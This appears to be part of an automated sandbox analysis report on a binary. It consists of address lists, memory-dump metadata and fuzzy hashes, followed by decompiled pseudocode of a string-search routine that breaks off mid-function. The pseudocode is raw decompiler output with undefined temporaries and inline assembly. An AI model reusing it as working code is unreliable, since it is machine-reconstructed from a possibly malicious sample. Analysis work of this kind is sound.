0x0041c8a8
0x0041c78e
0x0041c7b7
0x0041c7b7
0x0041c7b9
0x0041c7ba
0x0041c7bf
0x00000000
0x0041c7bf
0x0041c790
0x0041c793
0x0041c798
0x00000000
0x00000000
0x0041c79a
0x0041c79c
0x0041c79c
0x0041c79d
0x0041c7a2
0x0041c7a9
0x00000000
0x00000000
0x0041c7ab
0x0041c7af
0x0041c7b5
0x00000000
0x00000000
0x00000000
0x0041c7b5
0x00000000
0x0041c79c
0x0041c763
0x0041c768
0x0041c7d1
0x0041c7d3
0x0041c7d5
0x0041c819
0x0041c819
0x0041c81e
0x0041c823
0x0041c825
0x0041c82d
0x0041c82f
0x0041c835
0x0041c837
0x0041c839
0x0041c873
0x0041c875
0x00000000
0x0041c875
0x0041c83b
0x0041c83d
0x0041c866
0x0041c866
0x0041c868
0x0041c869
0x0041c86e
0x00000000
0x0041c86e
0x0041c83f
0x0041c842
0x0041c845
0x0041c847
0x00000000
0x00000000
0x0041c849
0x0041c849
0x0041c84b
0x0041c84b
0x0041c84c
0x0041c851
0x0041c856
0x0041c858
0x00000000
0x00000000
0x0041c85a
0x0041c85e
0x0041c862
0x0041c864
0x00000000
0x00000000
0x00000000
0x0041c864
0x00000000
0x0041c84b
0x0041c7da
0x0041c7dc
0x00000000
0x00000000
0x0041c7de
0x0041c7e5
0x0041c7eb
0x0041c7ee
0x0041c7ee
0x0041c7f0
0x0041c7f3
0x0041c7f7
0x0041c7f7
0x0041c7fb
0x0041c7fe
0x0041c801
0x0041c804
0x0041c807
0x0041c80a
0x00000000
0x00000000
0x0041c810
0x0041c815
0x0041c817
0x00000000
0x00000000
0x00000000
0x0041c817
0x0041c8c8
0x0041c8cc
0x0041c8cf
0x0041c8d1
0x00000000
0x00000000
0x0041c8d9
0x0041c8dc
0x0041c8e6
0x0041c8ec
0x0041c8ee
0x0041c8f2
0x0041c8f6
0x0041c8fa
0x0041c90a
0x0041c90a
0x0041c90a
0x0041c90c
0x0041c90e
0x00000000
0x00000000
0x0041c910
0x0041c912
0x0041c914
0x0041c98b
0x0041c98b
0x0041c98f
0x0041c993
0x0041c997
0x0041c999
0x00000000
0x00000000
0x0041c99f
0x0041c9a0
0x0041c9a6
0x00000000
0x00000000
0x0041c9a8
0x0041c9ac
0x0041c9b0
0x0041c9b0
0x0041c9b5
0x0041c9b5
0x0041c9b8
0x0041c9b8
0x0041c9ba
0x0041c9be
0x0041c9c2
0x0041c9c2
0x0041c9ca
0x0041c9cd
0x0041c9d1
0x0041c9d4
0x0041c9d7
0x0041c9da
0x0041c9e0
0x0041c9e6
0x0041c9e9
0x0041c9ec
0x00000000
0x00000000
0x0041c9f8
0x0041c9fa
0x0041ca02
0x0041ca02
0x0041ca06
0x0041ca0a
0x0041ca0e
0x0041ca12
0x0041ca12
0x0041ca14
0x00000000
0x00000000
0x0041ca1a
0x0041ca1e
0x0041ca22
0x0041ca26
0x0041ca26
0x0041ca28
0x0041ca28
0x0041ca2a
0x0041ca2c
0x0041ca2c
0x0041ca2f
0x00000000
0x00000000
0x0041ca39
0x0041ca3b
0x00000000
0x00000000
0x0041ca41
0x0041ca44
0x0041ca46
0x0041ca4a
0x0041ca4a
0x0041ca50
0x0041ca53
0x0041ca59
0x0041ca5c
0x0041ca67
0x0041ca6a
0x0041ca6d
0x00000000
0x00000000
0x0041ca77
0x0041ca79
0x00000000
0x00000000
0x0041ca7b
0x0041ca7b
0x0041ca7f
0x0041ca83
0x0041ca87
0x0041ca8b
0x0041ca8b
0x0041ca8d
0x0041caa8
0x0041cab4
0x0041cab4
0x0041caba
0x0041caba
0x0041cabf
0x0041cac3
0x0041cac7
0x0041cac9
0x00000000
0x00000000
0x0041cacf
0x0041cad2
0x0041cad4
0x00000000
0x00000000
0x0041cad6
0x0041cadc
0x0041caef
0x0041caef
0x0041caf4
0x0041caf6
0x0041caf6
0x0041caf9
0x0041cb15
0x0041cb21
0x0041cb21
0x0041cb27
0x0041cb27
0x0041cb2c
0x0041cb30
0x0041cb34
0x0041cb36
0x00000000
0x00000000
0x0041cb3c
0x0041cb3f
0x0041cb41
0x00000000
0x00000000
0x0041cb43
0x0041cb49
0x0041cb5c
0x0041cb5c
0x0041cb61
0x0041cb66
0x0041cb6e
0x0041cb70
0x0041cb72
0x0041cb74
0x0041cb77
0x0041cb79
0x0041cb7c
0x0041cb7f
0x0041cb81
0x0041cb84
0x0041cb86
0x0041ccdc
0x0041ccdc
0x0041cce6
0x0041cce8
0x0041ccee
0x0041ccf0
0x0041ccf2
0x0041cd31
0x00000000
0x0041cd31
0x0041ccf4
0x0041ccf6
0x0041cd1f
0x0041cd1f
0x0041cd21
0x0041cd22
0x0041cd27
0x00000000
0x0041cd27
0x0041ccf8
0x0041ccfb
0x0041ccfe
0x0041cd00
0x00000000
0x00000000
0x0041cd02
0x0041cd02
0x0041cd04
0x0041cd04
0x0041cd05
0x0041cd0a
0x0041cd0f
0x0041cd11
0x00000000
0x00000000
0x0041cd13
0x0041cd17
0x0041cd1b
0x0041cd1d
0x00000000
0x00000000
0x00000000
0x0041cd1d
0x00000000
0x0041cd04
0x0041cb8c
0x0041cb8f
0x0041cb91
0x00000000
0x00000000
0x0041cb97
0x0041cb99
0x0041cc09
0x0041cc0e
0x0041cc0e
0x0041cc11
0x0041cc14
0x0041cc17
0x0041cc19
0x0041cc2c
0x0041cc2f
0x0041cc2f
0x0041cc35
0x0041cc3d
0x0041cc3d
0x0041cc3d
0x0041cc3e
0x0041cc48
0x0041cc52
0x0041cc55
0x0041cc5b
0x0041cc5d
0x0041cc63
0x0041cc65
0x0041cc67
0x0041cca1
0x0041cca3
0x00000000
0x0041cc69
0x0041cc69
0x0041cc6b
0x0041cc94
0x0041cc94
0x0041cc96
0x0041cc97
0x0041cc9c
0x0041cca6
0x0041cca6
0x0041ccac
0x0041ccaf
0x0041ccb1
0x0041ccb1
0x0041ccb3
0x00000000
0x00000000
0x0041ccb9
0x0041ccc3
0x0041ccc3
0x0041ccc6
0x0041ccc7
0x0041ccca
0x0041cccc
0x00000000
0x00000000
0x0041ccce
0x0041ccd0
0x0041cd3b
0x00000000
0x0041cd3b
0x0041ccd2
0x0041ccd2
0x0041ccd4
0x00000000
0x00000000
0x0041ccbd
0x0041ccc0
0x0041ccc0
0x0041ccc0
0x0041ccc3
0x0041cc6d
0x0041cc70
0x0041cc73
0x0041cc75
0x00000000
0x00000000
0x0041cc77
0x0041cc77
0x0041cc79
0x0041cc79
0x0041cc7a
0x0041cc7f
0x0041cc84
0x0041cc86
0x00000000
0x00000000
0x0041cc88
0x0041cc8c
0x0041cc90
0x0041cc92
0x00000000
0x00000000
0x00000000
0x0041cc92
0x00000000
0x0041cc79
0x0041cc67
0x0041cc1b
0x00000000
0x0041cc1b
0x0041cb9d
0x0041cb9d
0x0041cba0
0x0041cbbd
0x0041cbc9
0x0041cbc9
0x0041cbcf
0x0041cbcf
0x0041cbd4
0x0041cbd8
0x0041cbdc
0x0041cbde
0x00000000
0x00000000
0x0041cbe4
0x0041cbe7
0x0041cbe9
0x00000000
0x00000000
0x0041cbeb
0x0041cbf1
0x0041cc04
0x0041cc04
0x00000000
0x00000000
0x00000000
0x00000000
0x0041cbf3
0x0041cbf3
0x0041cbf7
0x0041cbf9
0x00000000
0x00000000
0x0041cbfb
0x0041cbfc
0x0041cc02
0x00000000
0x00000000
0x00000000
0x0041cc02
0x00000000
0x0041cbf3
0x0041cd6b
0x0041cd70
0x00000000
0x0041cd70
0x0041cba2
0x0041cba4
0x0041cba7
0x00000000
0x00000000
0x0041cbae
0x0041cbae
0x0041cbb0
0x0041cbb0
0x0041cbb4
0x0041cbb6
0x00000000
0x00000000
0x0041cbb8
0x0041cbb9
0x0041cbbb
0x00000000
0x00000000
0x00000000
0x0041cbbb
0x00000000
0x00000000
0x00000000
0x00000000
0x0041cb4b
0x0041cb4b
0x0041cb4f
0x0041cb51
0x00000000
0x00000000
0x0041cb53
0x0041cb54
0x0041cb5a
0x00000000
0x00000000
0x00000000
0x0041cb5a
0x00000000
0x0041cb4b
0x0041cd77
0x0041cd7c
0x00000000
0x0041cd7c
0x0041cafb
0x0041cafd
0x0041caff
0x00000000
0x00000000
0x0041cb06
0x0041cb06
0x0041cb08
0x0041cb08
0x0041cb0c
0x0041cb0e
0x00000000
0x00000000
0x0041cb10
0x0041cb11
0x0041cb13
0x00000000
0x00000000
0x00000000
0x0041cb13
0x00000000
0x00000000
0x00000000
0x00000000
0x0041cade
0x0041cade
0x0041cae2
0x0041cae4
0x00000000
0x00000000
0x0041cae6
0x0041cae7
0x0041caed
0x00000000
0x00000000
0x00000000
0x0041caed
0x00000000
0x0041cade
0x0041cd83
0x0041cd88
0x00000000
0x0041cd88
0x0041ca8f
0x0041ca91
0x0041ca93
0x00000000
0x00000000
0x0041ca95
0x0041ca99
0x0041ca9b
0x0041ca9b
0x0041ca9f
0x0041caa1
0x00000000
0x00000000
0x0041caa3
0x0041caa4
0x0041caa6
0x00000000
0x00000000
0x00000000
0x0041caa6
0x00000000
0x0041ca9b
0x0041cd8f
0x0041cd93
0x0041cd97
0x0041cd9b
0x0041cdad
0x0041cdad
0x0041cdaf
0x0041cdb1
0x00000000
0x00000000
0x0041cdb3
0x0041cdb3
0x0041cdb5
0x0041cdb7
0x0041ce2e
0x0041ce2e
0x0041ce32
0x0041ce36
0x0041ce3a
0x0041ce3c
0x00000000
0x00000000
0x0041ce42
0x0041ce43
0x0041ce49
0x00000000
0x00000000
0x0041ce4b
0x0041ce4f
0x0041ce53
0x0041ce53
0x0041ce58
0x0041ce58
0x0041ce5c
0x0041ce5c
0x0041ce5e
0x0041ce62
0x0041ce66
0x0041ce66
0x0041ce6e
0x0041ce71
0x0041ce75
0x0041ce78
0x0041ce7b
0x0041ce7e
0x0041ce84
0x0041ce8a
0x0041ce8d
0x0041ce90
0x00000000
0x00000000
0x0041ce94
0x0041ce96
0x0041cea2
0x0041cea2
0x0041cea5
0x0041cea5
0x0041cea7
0x0041ceab
0x0041ceab
0x0041cead
0x00000000
0x00000000
0x00000000
0x0041cead
0x0041ce98
0x0041ce99
0x0041ce9d
0x00000000
0x00000000
0x00000000
0x0041ce9d
0x0041ceec
0x0041cef4
0x0041cefa
0x0041cefa
0x0041cefd
0x0041cf4b
0x0041cf4b
0x0041cf4f
0x00000000
0x0041cf4f
0x0041cf03
0x0041cf05
0x00000000
0x00000000
0x0041cf07
0x0041cf0b
0x0041cf0b
0x0041cf0d
0x0041cf11
0x0041cf15
0x0041cf15
0x0041cf1f
0x0041cf22
0x0041cf28
0x0041cf32
0x0041cf35
0x0041cf38
0x00000000
0x00000000
0x0041cf42
0x0041cf44
0x00000000
0x00000000
0x00000000
0x0041cf46
0x0041cda1
0x0041cda5
0x0041cda9
0x0041cdad
0x0041cdaf
0x0041cdb1
0x00000000
0x00000000
0x00000000
0x0041cdb1
0x0041cf58
0x0041cf5c
0x0041ced3
0x0041ced3
0x0041ced5
0x00000000
0x00000000
0x0041cedb
0x00000000
0x00000000
0x0041cee1
0x0041cee5
0x0041cee7
0x00000000
0x0041cee7
0x0041cdb9
0x0041cdbd
0x0041cdbf
0x0041cdc3
0x0041cdc7
0x0041cdcb
0x0041cdcd
0x00000000
0x00000000
0x0041cdd3
0x0041cdd4
0x0041cdd6
0x00000000
0x00000000
0x0041cdd8
0x0041cddc
0x0041cde0
0x00000000
0x0041cde0
0x0041cec7
0x0041cecb
0x0041cecf
0x00000000
0x0041cde4
0x0041cdf0
0x0041cdf4
0x0041cdf4
0x0041cdfa
0x0041cdfe
0x0041cdfe
0x0041ce03
0x0041ce07
0x0041ce0b
0x0041ce0d
0x00000000
0x00000000
0x0041ce13
0x0041ce16
0x0041ce18
0x00000000
0x00000000
0x0041ce1a
0x0041ce22
0x0041ce26
0x0041ce2c
0x00000000
0x00000000
0x00000000
0x0041ce2c
0x0041cf67
0x0041cf6c
0x0041cf70
0x0041cf76
0x00000000
0x0041cf76
0x0041cdad
0x0041ceb3
0x0041ceb3
0x0041ceb6
0x0041ceba
0x0041cebe
0x00000000
0x0041cebe
0x0041c9fc
0x0041c9fd
0x0041ca00
0x00000000
0x00000000
0x00000000
0x0041ca00
0x0041cf7f
0x0041cf87
0x0041cf8d
0x0041cf8d
0x0041cf90
0x00000000
0x00000000
0x0041cf9a
0x0041cf9c
0x00000000
0x00000000
0x0041cfa2
0x0041cfa6
0x0041cfa6
0x0041cfa8
0x0041cfac
0x0041cfb0
0x0041cfb0
0x0041cfba
0x0041cfbd
0x0041cfc3
0x0041cfcd
0x0041cfd0
0x0041cfd3
0x00000000
0x00000000
0x0041cfdd
0x0041cfdf
0x00000000
0x00000000
0x00000000
0x0041cfe1
0x0041c8fe
0x0041c902
0x0041c906
0x00000000
0x0041c906
0x0041cfe6
0x0041cfea
0x0041cd50
0x0041cd50
0x0041cd52
0x00000000
0x00000000
0x0041cd58
0x00000000
0x00000000
0x0041cd5e
0x0041cd62
0x00000000
0x0041cd62
0x0041c916
0x0041c91a
0x0041c91c
0x0041c920
0x0041c924
0x0041c928
0x0041c92a
0x00000000
0x00000000
0x0041c930
0x0041c931
0x0041c933
0x00000000
0x00000000
0x0041c935
0x0041c939
0x0041c93d
0x00000000
0x0041c93d
0x0041cd44
0x0041cd48
0x0041cd4c
0x00000000
0x0041c941
0x0041c94d
0x0041c951
0x0041c951
0x0041c957
0x0041c95b
0x0041c95b
0x0041c960
0x0041c964
0x0041c968
0x0041c96a
0x00000000
0x00000000
0x0041c970
0x0041c973
0x0041c975
0x00000000
0x00000000
0x0041c977
0x0041c97f
0x0041c983
0x0041c989
0x00000000
0x00000000
0x00000000
0x0041c989
0x0041cff5
0x0041cffa
0x0041cffe
0x0041d004
0x00000000
0x0041d004
0x0041c90a
0x00000000
0x0041c768
0x0041c704
0x0041c707
0x0041c70a
0x0041c70c
0x00000000
0x00000000
0x0041c70e
0x0041c70e
0x0041c710
0x0041c710
0x0041c711
0x0041c716
0x0041c71b
0x0041c71d
0x00000000
0x00000000
0x0041c71f
0x0041c723
0x0041c727
0x0041c729
0x00000000
0x00000000
0x00000000
0x0041c729
0x00000000
0x0041c710
0x0041c6fe
0x0041c6b1
0x00000000
0x0041c6b1
0x0041c623
0x0041c623
0x0041c626
0x0041c646
0x0041c64a
0x0041c656
0x0041c656
0x0041c65c
0x0041c65c
0x0041c661
0x0041c665
0x0041c669
0x0041c66b
0x00000000
0x00000000
0x0041c671
0x0041c674
0x0041c676
0x00000000
0x00000000
0x0041c678
0x0041c67e
0x0041c695
0x0041c695
0x0041c69a
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c680
0x0041c680
0x0041c684
0x0041c686
0x00000000
0x00000000
0x0041c68c
0x0041c68d
0x0041c693
0x00000000
0x00000000
0x00000000
0x0041c693
0x0041c8ab
0x0041c8ab
0x0041c8ae
0x0041c8be
0x0041c8b0
0x0041c8b2
0x0041c8b5
0x0041c8b5
0x00000000
0x0041c8ae
0x0041d00d
0x0041d012
0x00000000
0x0041d012
0x0041c628
0x0041c62a
0x0041c62c
0x00000000
0x00000000
0x0041c633
0x0041c633
0x0041c635
0x0041c635
0x0041c639
0x0041c63b
0x00000000
0x00000000
0x0041c641
0x0041c642
0x0041c644
0x00000000
0x00000000
0x00000000
0x0041c644
0x00000000
0x0041c635
0x0041c610
0x00000000
0x0041c610
0x0041c5c1
0x0041c5ea
0x0041c5ea
0x0041c5ec
0x0041c5ed
0x0041c5f2
0x00000000
0x0041c5f2
0x0041c5c3
0x0041c5c6
0x0041c5cb
0x00000000
0x00000000
0x0041c5cf
0x0041c5cf
0x0041c5d0
0x0041c5d5
0x0041c5dc
0x00000000
0x00000000
0x0041c5de
0x0041c5e2
0x0041c5e8
0x00000000
0x00000000
0x00000000
0x0041c5e8
0x00000000

Strings

@, xrefs: 0041C600

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 34e3e757357182d4be67d558aec357958c2c3175704b9db7323992076a550c51
Instruction ID: 0cc54d778dede7273c8b162b86d24c2a023961e31d86c3f644e1b978f745275e
Opcode Fuzzy Hash: 34e3e757357182d4be67d558aec357958c2c3175704b9db7323992076a550c51
Instruction Fuzzy Hash: 9162E6756443128BC7148F29C8C06ABB7E2BFD8754F18872EE895973A4E738DD81C789

Uniqueness

Uniqueness Score: -1.00%

Function 00422E60, Relevance: 2.0, Strings: 1, Instructions: 797
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00422E60(signed int __ecx, void* __eflags, signed int _a4, char _a8) {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t230;
				signed int _t231;
				signed int* _t237;
				char* _t238;
				void* _t245;
				signed int _t246;
				char _t249;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				void* _t257;
				void* _t258;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t268;
				char _t271;
				signed int _t273;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t284;
				void* _t286;
				void* _t288;
				signed int _t292;
				void* _t295;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t308;
				signed int _t310;
				signed int _t311;
				char _t312;
				char _t313;
				char _t314;
				char _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				void* _t330;
				signed int _t331;
				signed int _t332;
				signed int _t335;
				signed int _t336;
				void* _t337;
				signed int _t340;
				void* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				char* _t347;
				signed int _t350;
				signed int _t352;
				void* _t355;
				signed int _t357;
				char _t359;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t386;
				void* _t389;
				signed int _t390;
				char _t392;
				signed int _t395;
				signed int _t400;
				char _t402;
				char _t403;
				char _t404;
				signed int _t406;
				unsigned int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t416;
				signed int _t421;
				signed int _t422;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t441;
				signed int _t443;
				signed int _t449;
				signed int _t450;
				signed int _t452;
				signed int _t461;
				signed int _t465;
				signed int _t466;
				signed int _t468;
				signed int _t469;
				signed int _t478;
				signed int _t482;
				void* _t485;

				_v56 = 0;
				_t449 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t406 = E00411030();
				_t485 = (_t482 & 0xfffffff0) - 0x34 + 4;
				_t230 = _v56;
				if(_t230 == 0) {
					 *_t406 = 0;
					L8:
					_t231 = _a8;
					_v52 = 0x40;
					_v56 = _t406;
					if(_t231 != 0) {
						__eflags = _t406;
						if(_t406 == 0) {
							_t310 = 0x40;
							_t283 = 0;
							L22:
							_t20 = _t283 + 2; // 0x80000001
							_t341 = _t20;
							__eflags = _t341 - 0x40;
							_t342 =  <=  ? 0x40 : _t341;
							__eflags = _t310 - _t342;
							if(_t310 < _t342) {
								_t411 = (_t342 >> 5 >> 0x1a) + _t342 >> 6;
								_t343 = _t342 & 0x8000003f;
								__eflags = _t343;
								if(_t343 < 0) {
									_t343 = (_t343 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t343;
								}
								__eflags = _t343;
								_t413 = _t411 + (0 | _t343 > 0x00000000) << 6;
								_push(_t413);
								_t311 = E00411030();
								_t485 = _t485 + 4;
								_t344 = _v56;
								__eflags = _t344;
								if(_t344 == 0) {
									 *_t311 = 0;
									goto L35;
								} else {
									__eflags = _t311;
									if(_t311 == 0) {
										L33:
										_push(1);
										_push(_t344);
										_v68 = _t311;
										E004110B0();
										_t311 = _v68;
										_t485 = _t485 + 8;
										L35:
										_v52 = _t413;
										_v56 = _t311;
										L36:
										 *((char*)(_t311 + _t283)) = _a8;
										_t237 =  &_v56;
										 *((char*)(_t283 +  *_t237 + 1)) = 0;
										L37:
										_t238 =  *_t237;
										_v28 = _t238;
										_t284 = _a4;
										if(_t238 == 0) {
											L39:
											_push(0x40);
											 *_t284 = 0;
											 *(_t284 + 4) = 0;
											_t450 = E00411030();
											_t485 = _t485 + 4;
											_t347 =  *_t284;
											if(_t347 == 0) {
												 *_t450 = 0;
												L61:
												 *_t284 = _t450;
												 *(_t284 + 4) = 0x40;
												L62:
												_push(1);
												_push(_v56);
												E004110B0();
												_v56 = 0;
												_v52 = 0;
												return _t284;
											}
											if(_t450 == 0) {
												L45:
												_push(1);
												_push(_t347);
												E004110B0();
												_t485 = _t485 + 8;
												goto L61;
											}
											_t312 =  *_t347;
											 *_t450 = _t312;
											if(_t312 == 0) {
												goto L45;
											}
											_t415 = 0;
											while(1) {
												_t415 = _t415 + 1;
												_t313 =  *((char*)(_t347 + _t415 * 2 - 1));
												 *((char*)(_t450 + _t415 * 2 - 1)) = _t313;
												if(_t313 == 0) {
													goto L45;
												}
												_t314 =  *((char*)(_t347 + _t415 * 2));
												 *((char*)(_t450 + _t415 * 2)) = _t314;
												if(_t314 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t315 =  *_t238;
										_v48 = _t315;
										if(_t315 != 0) {
											_t350 =  *_t449;
											_v60 = _t350;
											__eflags = _t350;
											if(_t350 == 0) {
												L53:
												_push(0x40);
												 *_t284 = 0;
												 *(_t284 + 4) = 0;
												_t450 = E00411030();
												_t485 = _t485 + 4;
												_t352 =  *_t284;
												__eflags = _t352;
												if(_t352 == 0) {
													 *_t450 = 0;
													goto L61;
												}
												__eflags = _t450;
												if(_t450 == 0) {
													L59:
													_push(1);
													_push(_t352);
													E004110B0();
													_t485 = _t485 + 8;
													goto L61;
												}
												_t316 =  *_t352;
												 *_t450 = _t316;
												__eflags = _t316;
												if(_t316 == 0) {
													goto L59;
												}
												_t416 = 0;
												__eflags = 0;
												while(1) {
													_t416 = _t416 + 1;
													_t317 =  *((char*)(_t352 + _t416 * 2 - 1));
													 *(_t450 + _t416 * 2 - 1) = _t317;
													__eflags = _t317;
													if(_t317 == 0) {
														goto L59;
													}
													_t318 =  *((char*)(_t352 + _t416 * 2));
													 *(_t450 + _t416 * 2) = _t318;
													__eflags = _t318;
													if(_t318 != 0) {
														continue;
													}
													goto L59;
												}
												goto L59;
											}
											__eflags =  *_t350;
											if( *_t350 == 0) {
												goto L53;
											}
											_t417 = _t315;
											_t319 = _t350;
											_t63 = _t417 - 0x41; // -65
											_t452 = _t63;
											_v64 = _t452;
											__eflags = _t452 - 0x19;
											_t65 = _t417 + 0x20; // 0x20
											_t354 =  >  ? _t315 : _t65;
											_t245 =  >  ? _t315 : _t65;
											_t355 = 0;
											__eflags = 0;
											while(1) {
												_t286 =  *_t319;
												__eflags = _t286 - 0x41 - 0x19;
												_t287 =  <=  ? _t286 + 0x20 : _t286;
												__eflags = ( <=  ? _t286 + 0x20 : _t286) - _t245;
												if(( <=  ? _t286 + 0x20 : _t286) == _t245) {
													break;
												}
												_t355 = _t355 + 1;
												_t319 = _t319 + 1;
												_t300 = _v60;
												__eflags =  *((char*)(_t355 + _t300));
												if( *((char*)(_t355 + _t300)) != 0) {
													continue;
												}
												L52:
												_t284 = _a4;
												goto L53;
											}
											_t284 = _a4;
											__eflags = _t319;
											if(_t319 == 0) {
												goto L53;
											}
											_t357 = _v28 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t421 =  ~_t357 + 0x10;
											__eflags = _t421;
											_v32 = _t421;
											_v40 = _v48 + 0x20;
											_t246 = _t421;
											do {
												_t422 = _t357;
												__eflags = _t357;
												if(_t357 == 0) {
													L69:
													_t461 =  ~( ~_t422 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t461;
													while(1) {
														asm("movdqu xmm1, [eax+edi]");
														asm("pcmpeqb xmm1, xmm0");
														asm("pmovmskb ebx, xmm1");
														__eflags = _t284;
														if(_t284 != 0) {
															break;
														}
														_t422 = _t422 + 0x10;
														__eflags = _t422 - _t461;
														if(_t422 < _t461) {
															continue;
														}
														__eflags = _t461 - 0x7fffffff;
														if(_t461 >= 0x7fffffff) {
															L76:
															_t461 = 0x7fffffff;
															L77:
															_v68 = _t461;
															_t288 = 0;
															__eflags = 0;
															_v44 = _t357;
															while(1) {
																_t249 =  *((char*)(_t288 + _t319));
																_t359 =  *((char*)(_t288 + _v28));
																__eflags = _t249 - 0x61 - 0x19;
																_t250 =  <=  ? _t249 - 0x20 : _t249;
																__eflags = _t359 - 0x61 - 0x19;
																_t251 =  <=  ? _t249 - 0x20 : _t249;
																_t360 =  <=  ? _t359 - 0x20 : _t359;
																_t361 =  <=  ? _t359 - 0x20 : _t359;
																__eflags = _t251 - ( <=  ? _t359 - 0x20 : _t359);
																if(__eflags < 0 || __eflags > 0) {
																	break;
																}
																__eflags = _t251;
																if(_t251 == 0) {
																	L82:
																	_t357 = _v44;
																	_t466 = _v40;
																	_t284 = _a4;
																	L83:
																	__eflags = _t319;
																	if(_t319 == 0) {
																		goto L53;
																	}
																	_v44 = _t357;
																	while(1) {
																		L85:
																		_t254 = _t319;
																		_t292 = _t319 + 1;
																		__eflags = _t292;
																		if(_t292 == 0) {
																			break;
																		}
																		__eflags =  *(_t319 + 1);
																		if( *(_t319 + 1) == 0) {
																			break;
																		}
																		__eflags = _v64 - 0x19;
																		_t388 =  <=  ? _t466 : _v48;
																		_t389 =  <=  ? _t466 : _v48;
																		_v36 = _t254;
																		_v40 = _t466;
																		while(1) {
																			_t319 = _t319 + 1;
																			_t292 = _t292 + 1;
																			_t266 =  *_t319 & 0x000000ff;
																			_t466 =  *((char*)(_t292 - 1)) + 0xffffffbf;
																			__eflags = _t466 - 0x19;
																			_t267 =  <=  ? _t266 + 0x20 : _t266;
																			__eflags = ( <=  ? _t266 + 0x20 : _t266) - _t389;
																			if(( <=  ? _t266 + 0x20 : _t266) == _t389) {
																				break;
																			}
																			__eflags =  *_t292;
																			if( *_t292 != 0) {
																				continue;
																			}
																			L90:
																			_t254 = _v36;
																			_t365 = _v44;
																			_t284 = _a4;
																			L91:
																			__eflags = _t365;
																			if(_t365 == 0) {
																				L95:
																				_t325 =  ~( ~_t365 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																				__eflags = _t325;
																				while(1) {
																					asm("movdqu xmm1, [edi+edx]");
																					asm("pcmpeqb xmm1, xmm0");
																					asm("pmovmskb esi, xmm1");
																					__eflags = _t466;
																					if(_t466 != 0) {
																						break;
																					}
																					_t365 = _t365 + 0x10;
																					__eflags = _t365 - _t325;
																					if(_t365 < _t325) {
																						continue;
																					}
																					__eflags = _t325 - 0x7fffffff;
																					if(_t325 >= 0x7fffffff) {
																						L102:
																						_t325 = 0x7fffffff;
																						L103:
																						_t468 = _v60 & 0x0000000f;
																						__eflags = _t468;
																						if(_t468 == 0) {
																							L107:
																							_t433 =  ~( ~_t468 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																							__eflags = _t433;
																							while(1) {
																								asm("movdqu xmm1, [ebx+esi]");
																								asm("pcmpeqb xmm1, xmm0");
																								asm("pmovmskb edx, xmm1");
																								__eflags = _t365;
																								if(_t365 != 0) {
																									break;
																								}
																								_t468 = _t468 + 0x10;
																								__eflags = _t468 - _t433;
																								if(_t468 < _t433) {
																									continue;
																								}
																								_t284 = _a4;
																								__eflags = _t433 - 0x7fffffff;
																								if(_t433 >= 0x7fffffff) {
																									L114:
																									_t433 = 0x7fffffff;
																									L115:
																									_t366 = _v60;
																									_t256 = _t254 - _t366 + _t325;
																									_t326 = 0;
																									__eflags = _t256;
																									 *_t284 = 0;
																									_t257 =  <=  ? 0 : _t256;
																									__eflags = _t433 - _t257;
																									 *(_t284 + 4) = 0;
																									_t258 =  <  ? _t433 : _t257;
																									_t434 = _t433 - _t258;
																									_t367 = _t366 + _t258;
																									__eflags = _t367;
																									_v64 = _t367;
																									if(_t367 == 0) {
																										L151:
																										_push(0x40);
																										_t450 = E00411030();
																										_t485 = _t485 + 4;
																										_t368 =  *_t284;
																										__eflags = _t368;
																										if(_t368 == 0) {
																											 *_t450 = 0;
																											goto L61;
																										}
																										__eflags = _t450;
																										if(_t450 == 0) {
																											L157:
																											_push(1);
																											_push(_t368);
																											E004110B0();
																											_t485 = _t485 + 8;
																											goto L61;
																										}
																										_t327 =  *_t368;
																										 *_t450 = _t327;
																										__eflags = _t327;
																										if(_t327 == 0) {
																											goto L157;
																										}
																										_t435 = 0;
																										__eflags = 0;
																										while(1) {
																											_t435 = _t435 + 1;
																											_t328 =  *((char*)(_t368 + _t435 * 2 - 1));
																											 *(_t450 + _t435 * 2 - 1) = _t328;
																											__eflags = _t328;
																											if(_t328 == 0) {
																												goto L157;
																											}
																											_t329 =  *((char*)(_t368 + _t435 * 2));
																											 *(_t450 + _t435 * 2) = _t329;
																											__eflags = _t329;
																											if(_t329 != 0) {
																												continue;
																											}
																											goto L157;
																										}
																										goto L157;
																									}
																									_t369 = _v60;
																									__eflags =  *(_t369 + _t258);
																									if( *(_t369 + _t258) == 0) {
																										goto L151;
																									}
																									__eflags = _t434;
																									if(_t434 != 0) {
																										L130:
																										_t144 = _t434 + 1; // 0x80000000
																										_t330 = _t144;
																										__eflags = _t330 - 0x40;
																										_t331 =  <=  ? 0x40 : _t330;
																										__eflags = _t331;
																										if(_t331 > 0) {
																											_v68 = (_t331 >> 5 >> 0x1a) + _t331 >> 6;
